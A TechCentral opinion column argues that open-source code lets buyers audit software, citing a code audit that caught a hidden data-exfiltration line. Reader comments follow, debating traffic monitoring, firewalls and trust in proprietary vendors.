In defence of open source

[By Jason Norwood-Young]

Late last year, I was asked to audit some software that had been developed overseas and bought by a large SA company to launch a new consumer website. It all looked pretty straightforward, until I noticed a strange line in the code: every time a new subscriber signed up, the software would forward this information to a mysterious IP address.

Clearly, someone working on the code had decided to do a bit of information mining. The combination of full name, address and e-mail of all the users of this site could be sold for a pretty penny to spammers. The site also accepted and processed credit card payments. Whoever engineered the malicious code had missed a golden opportunity — it would have been just as easy to steal credit card details, complete with expiry dates and security codes.

All the while, the customer would have had the false sense of security from the little lock in their browser, since this “hack” would not have interfered with the secure session established between themselves and the website.

There are only two ways that this potential theft could have been detected before the website went live. The first would have been fairly technically complex. We could have set the site up in a controlled environment and examined all the information sent in and out of the system. It would have been time consuming in the extreme, have required a great deal of technical expertise and would not have been 100% guaranteed.

The second way would be for someone to read the code, which is how we found the problem. For this to happen, we required “open-source” software – software where the code is clearly visible, and in this case editable. Not only could we detect the problem, we could fix it. The site still went live, without the security issues.

These are two reasons that as an IT buyer I lean towards open-source software. If there’s a problem, I can identify it and fix it. That doesn’t mean that I audit every piece of software that I run. There aren’t enough hours in the day. But I’ll often dive in and have a quick look around before committing to certain software. Poor coding styles and obvious unnecessary outgoing links should ring alarm bells.

Equally, it’s why I distrust proprietary software. I don’t know what it’s doing most of the time, and I assume the worst. I also don’t see the need to guard the software so closely.

An important element of open source is that is never gives up software copyright. All it does is gives me permission to view – and usually edit – the source code. (You also get “free” open source but it’s not as socialist as the proprietary software companies would have us believe.)

Proprietary software is like buying a car that comes with the bonnet welded shut. To check your oil or water levels would require a trip to the manufacturer, and a fee to go with it. Their biggest concern is that, should I see the engine, I would immediately go and create my own car from scratch.

Even though I can open my car’s bonnet, I really haven’t the first clue what most of the stuff does. I don’t have the expertise, skill or inclination to attempt to recreate a car. I trust that my car manufacturer knows how to build an engine, and car, better than I can.

Likewise, I assume that Microsoft or Apple know a lot more about building operating systems than I do. And yet they insist that the bonnet be welded shut.

I use the Apache Web server extensively, and it is open source. I can see how they built it and make my own Web server, but I’m not going to. Apache dominates the Internet, used on more than 60% of the top servers (and rising), compared to Microsoft’s 17% (and dropping). (See Netcraft for the latest figures.)

In the cloud
Those who don’t see the relation between the Internet and enterprise software will not like the next five years. There’s a shift to using Internet technologies such as Flash and HTML5 for enterprise applications, and simply outsourcing large portions of traditional infrastructure to the Web.

Though a lot can be pushed to the ever-growing Internet cloud, if a specific software project is a core competitive advantage, companies will probably still keep it in house. But if you’re still building your internal apps as desktop apps in some obscure language, or as client-server apps in Java, you’re heading for trouble. The cost of finding skills to support these apps will steadily grow, while your competitors that have moved to more open technologies and languages, such as PHP or Python, will see their skills costs reducing as they can use the biggest pool of developers. The emergence of JavaScript as a serious language is adding impetus to this movement, and it’s probably the wisest place to invest in training and skills.

The great thing about PHP, Python and JavaScript is they all lend themselves to an open-source environment. This in turn gives companies much more security in their code investments, and the skills to audit their software suppliers’ code — provided, of course, that they ship their code without the bonnet welded shut.

  • Jason Norwood-Young is CEO of 10Layer, building the tools news publishers use to publish. A recovering journalist still struggling with geekiness, he’s also been technical manager at the Mail & Guardian Online, technology editor at ITWeb and deputy editor at Stuff magazine.
Related Posts Plugin for WordPress, Blogger...

Share this article

  • http://twitter.com/rmaclean Robert MacLean

    1) “The first would have been fairly technically complex. We could have set the site up in a controlled environment and examined all the information sent in and out of the system. It would have been time consuming in the extreme, have required a great deal of technical expertise and would not have been 100% guaranteed.”
    You mean like the fairly simple setup firewall and monitor traffic that is done daily by millions of companies? Really, you think that is complex, time consuming (more than reading code) and have a great deal of required skill. I think that just shows us that you don’t understand networking.
    2) “These are two reasons that as an IT buyer I lean towards open-source software. If there’s a problem, I can identify it and fix it.”
    That ASSUMES people read and validate open source code. It has long been proven that on anything but the largest projects people are not doing that – mostly because it is boring and lacks glamour which they could get from implementing new features.
    You could argue the burden is with the companies to check what they use, but that increases costs and time when you could be using a propriatary software that has been audited and checked properly, but that means you trust the development company. So either you trust people you have never met and have no legal reason to will have checked or you trust a company who has a legal requirement to do it has checked but possibly no way for you to check on them. By using software you are giving trust to someone, it is a trade off between who that is vs. trusting no one and spending time/money to do it yourself. There is no perfect answer.
    3) “And yet they insist that the bonnet be welded shut.”
    Can’t say for Apple, but for Microsoft most of their code is available. For example .NET is open source and freely available. Windows the source code can be requested, there is some documents to complete and NDA’s but the code is there if you wish to audit it – and people like the American DOJ do that.
    4) “There’s a shift to using Internet technologies such as Flash”
    I would say that there is a shift away from Flash to things like HTML for consumer based internet solutions. In the corporate space (i.e. within companies) I do not see a huge shifts yet to or away from any technologies, this is expected as corporates move slower than consumers.
    5) “The cost of finding skills to support these apps will steadily grow, while your competitors that have moved to more open technologies and languages, such as PHP or Python, will see their skills costs reducing as they can use the biggest pool of developers. The emergence of JavaScript as a serious language is adding impetus to this movement, and it’s probably the wisest place to invest in training and skills.”
    Very big jump from open source giving advantages to security and trust, to somehow there is more developers investing in certain technologies. You provided good stats to backup your IIS vs. Apache comment, where is the proof for this one.
    In addition nothing in PHP or Python will make you open source – open source is about a commitment on a business level not a technology one. You can have a very closed source solution on top of those technologies, for example Facebook’s system is built on top of PHP but you can’t get the code for that.
    Finally I would say that developer skills + the quality of tools available will define cost. PHP & Python are seriously lagging behind mature frameworks and toolsets that languages like C# & Java have and it is the total cost of ownership (TCO) that is a valid measure… not just the fact open source developers using aging web technologies may be cheaper to staff.

  • http://twitter.com/thewomble_za Greg Mahlknecht

    Standard open source fanboy fare.   Bottom line: only use software from vendors you trust.  Whether it’s open or closed source is personal preference, and has very little merit in a solution.

    The Netcraft stats are pretty much universally dimissed as domain parking stats, they’re not relevant when comparing marketshares.  In the real world, MS Server is eating away at Linux’s marketshare, and rightly so – it’s going from strength to strength.

    Robert: agreed re: point 1… i also thought “WTF?”

  • Anonymous

    So… disclose the software supplier!

  • http://twitter.com/EventsZA EventsZA

    Hmm, “Fanboy Fare”, if that is what the author’s article is, then so is your comment. As to traffic monitoring, that’s like trying to lock the door after the horse has bolted. Although, do use it, once you discover there’s a problem you can do something about it. Similarly by auditing the software code, a potential issue was discovered BEFORE it could become a security exploit.

  • http://twitter.com/waynegemmell Wayne Gemmell

    The most important justification for open source in my books anyway is that it is a HUGE enabler of the little guy. You can start a business with very little capital and a lot of spare time and potentially churn out a google or twitter.

  • http://twitter.com/hendra Hendra

    I would think that setting it up in a controlled environment and monitor the traffic is easier than going thru the seemingly endless lines of codes, no?

  • http://twitter.com/stevesong Steve Song

    It is a shame that these debates quickly become so polarised.  In truth, any software ecosystem benefits from both open and closed software.  Apple got a huge leg up from the open platform that it is built on and Ubuntu in turn got a design leg up from Apple’s lovely UI design.  Getting rid of proprietary software would be like the church getting rid of the devil.  It turns out to be, pardon the pun, a necessary evil.  :-)

    More interesting is thinking about what benefits most from being open and that is definitely the tools for creating things.  Programming languages, frameworks, development tools, and web servers benefit everyone when they are open.  Keeping the tools open lowers the bar for creation an innovation.  It lets us all, rich and poor, stand on the shoulders of giants.

  • http://twitter.com/thewomble_za Greg Mahlknecht

    >>Hmm, “Fanboy Fare”, if that is what the author’s article is, then so is your comment.

    How so?  I simply said open/closed is largely irrelevant, unless I’m a fanboy of software in general, both open and closed?
    >> As to traffic monitoring, that’s like trying to lock the door after the horse has bolted.

    Not sure what this means. 

    >>Similarly by auditing the software code, a potential issue was discovered BEFORE it could become a security exploit.     

    The result was not under question, the idea of setting up an environment in a VM and setting a packet sniffer on it being “technically complex”.  In fact, they should do this anyway, as reading hundreds of thousands of lines of code you could easily miss an obfuscated vulnerability.  It *gasp* even happens in open source software from time to time.

    PHP and many common packages built on it are notoriously vulnerable.  But I won’t say that makes open source suck, the same rules apply to both open and closed source – make sure you have a 2nd line of defence with network security, and keep your software packages up to date and patched!

  • Me

    In fact a firewall configuration that avoids outgoing (started from the server) connections is a must in production, not only for testing. You only authorize outgoing connections needed for the normal functioning of the server (email notifications, etc…) and forbid the rest. This would avoid many problems, like the one you described, or an attacker downloading a toolkit to escalate privileges once he has non-root access to the system, etc…

  • http://twitter.com/rmaclean Robert MacLean

    I think this is very team specific. I previously was part of an start up that did it all on open source, not for the open source side but the licensing aspect. We had the time & skill to work with it. If I were to do it now, I would likely signup for something like Microsoft BizSpark – get the software for free (or atleast cheaper) and work in the area where my skill is now as trying to remember some of that Perl & PHP we wrote should never be attempted ;)

  • http://twitter.com/rmaclean Robert MacLean

    Think you merging two distinct ideas here

    1) Could a large software vendor using the obsecurity of closed source spy on us?

    Possibly, but closed source doesn’t prevent things like network traffic being monitored or blocked. Microsoft Window’s activation system you point to does not ‘dial home’ in a corporate environment only in the home environment – why? because corporates have activation servers. Easy to spot when a machine is trying to ‘dial home’ and shouldn’t be in that case. In addition Windows source code has been looked at by many people outside of Microsoft as part of security & government requirements and can be requested by individuals, like you, with the proper motivational documents and proof you not going to leak it to slashdot.

    2) Could government spy on us?

    Sure, but there are easier ways than bribing every OS developer out there to insert it or making their own OS. Why not just errect a firewall like China has and control and monitor that way.

    Interesting you seem to thing a real issue like the secrecy bill is less important than a theortical issue like govt. spyware.

  • Anonymous

    I agree with Robert. There are some best of breed technologies available for free to startups from Microsoft (gasp!). Write your code in C# and you’ve built your software on a modern, growing  technology, have access to a pool of skilled, talented professionals and have a large multinational software company a a partner.

  • Andrew Rens

    Robert you  have misread what I was saying so  badly that it seems better to credit you with the intelligence to have done so deliberately . What exactly is your relationship to Microsoft?

    I never suggested that the South African government would use software to spy on its citizens. Nor did I say that the secrecy bill wasn’t important, I’ve already said in interviews and articles that it is a mistake.

    Instead what I said was that if government is concerned about keeping certain information then instead of trying to pass the draconian secrecy bill government should take a look at the proprietary software that is currently used by government. In some cases it is not a question whether that software might contain spyware or not for example some Microsoft products are publicly known to include spyware that searches for alleged copyright violations and reports back to Redmond.  What information it actually sends isn’t known because the code is closed. Foreign proprietary software vendors have loyalty to the countries where they are based, where their directors live, and their profits are enjoyed. There are many incentives for such foreign companies to pass sensitive South African government information on to there own governments. How is that not a security threat?

    As I said, that is a far more real threat than the threats government imagined when it conjured up the secrecy bill.

    You say that ” In addition Windows source code has been looked at by many people
    outside of Microsoft as part of security & government requirements
    and can be requested by individuals, like you, with the proper
    motivational documents and proof you not going to leak it to slashdot.”

    So instead of open source which anyone can look at any time you suggest that we trust code when people can’t look at the working code itself but must take the word of “experts” who have seen something that they have been told is the code and only asking pretty please and signing an NDA.

    Its simpler to just use open source.

  • http://twitter.com/thewomble_za Greg Mahlknecht

    >> we trust code when people can’t look at the working code itself but must take the word of “experts”

    I assume you use an open-source browser.  Do you compile each update from the source yourself?  How do you know the code you’re running isn’t contaminated with secret backdoors, and is indeed a compile of the freely available source?  And if someone else has, and posts in a blog it’s safe, how can you take the word of these “experts”?

    I do quite a lot of traffic sniffing when debugging stuff, and Chrome does a LOT of encrypted chatter to “safebrowsing-cache.google.com” … they TELL us it’s a url blacklist to protect you and point to an open spec, but I haven’t inspected the source code myself and compiled it into my own binary, so I can’t be sure.  It could all be a massive collaboration with the US Government to, as you say, send ” data on its activities to the subject of another sovereign nation”

    Conspiracy theories work both ways, dude.  The “oh but the source is available” is about as strong an argument as “torrents are used to download linux ISOs” … not many people compile everything from source, they download binaries.  That’s where the argument falls apart.

    I assume you’re not a big cloud fan?  That takes this to a whole new level.   The closed-ness of it must make your skin crawl.

  • http://twitter.com/thewomble_za Greg Mahlknecht

    >> we trust code when people can’t look at the working code itself but must take the word of “experts”

    I assume you use an open-source browser.  Do you compile each update from the source yourself?  How do you know the code you’re running isn’t contaminated with secret backdoors, and is indeed a compile of the freely available source?  And if someone else has, and posts in a blog it’s safe, how can you take the word of these “experts”?

    I do quite a lot of traffic sniffing when debugging stuff, and Chrome does a LOT of encrypted chatter to “safebrowsing-cache.google.com” … they TELL us it’s a url blacklist to protect you and point to an open spec, but I haven’t inspected the source code myself and compiled it into my own binary, so I can’t be sure.  It could all be a massive collaboration with the US Government to, as you say, send ” data on its activities to the subject of another sovereign nation”

    Conspiracy theories work both ways, dude.  The “oh but the source is available” is about as strong an argument as “torrents are used to download linux ISOs” … not many people compile everything from source, they download binaries.  That’s where the argument falls apart.

    I assume you’re not a big cloud fan?  That takes this to a whole new level.   The closed-ness of it must make your skin crawl.

Why TechCentral?

We know that as a prospective advertiser, you are spoilt for choice. Our job is to demonstrate why TechCentral delivers the best return for your advertising spend.

TechCentral is South Africa’s online technology news leader. We don’t say that lightly. We believe we produce the country’s best and most insightful online tech news aimed at industry professionals and those interested in the fast-changing world of technology.

We provide news, reviews and comment, without fear or favour, that is of direct relevance to our fast-expanding audience. Proportionately, we provide the largest local audience of all technology-focused online publishers.

We do not constantly regurgitate press releases to draw in search engine traffic — we believe websites that do so are doing their readers and advertisers a disservice. Nor do we sell “editorial features”, offer advertising “press offices” or rely on online bulletin-board forums of questionable value to advertisers to bolster our traffic.

TechCentral, which is edited and written by award-winning South African journalists, cares about delivering top-quality content to draw in the business and consumer readers that are of most interest to technology advertisers.

We’d like the opportunity to demonstrate the value of directing a portion of your advertising budget to TechCentral, whether your company is in the technology field or not. Numerous opportunities exist for companies interested in reaching our audience of key decision-makers in South Africa’s dynamic information and communications technology sector. We offer packages that will deliver among the best returns on investment available in the online technology news space.

For more information about advertising opportunities, and how your organisation can benefit by publicising itself on TechCentral, please call us on 011-792-0449 during office hours. Or send us an e-mail and ask for our latest rate card and brochure.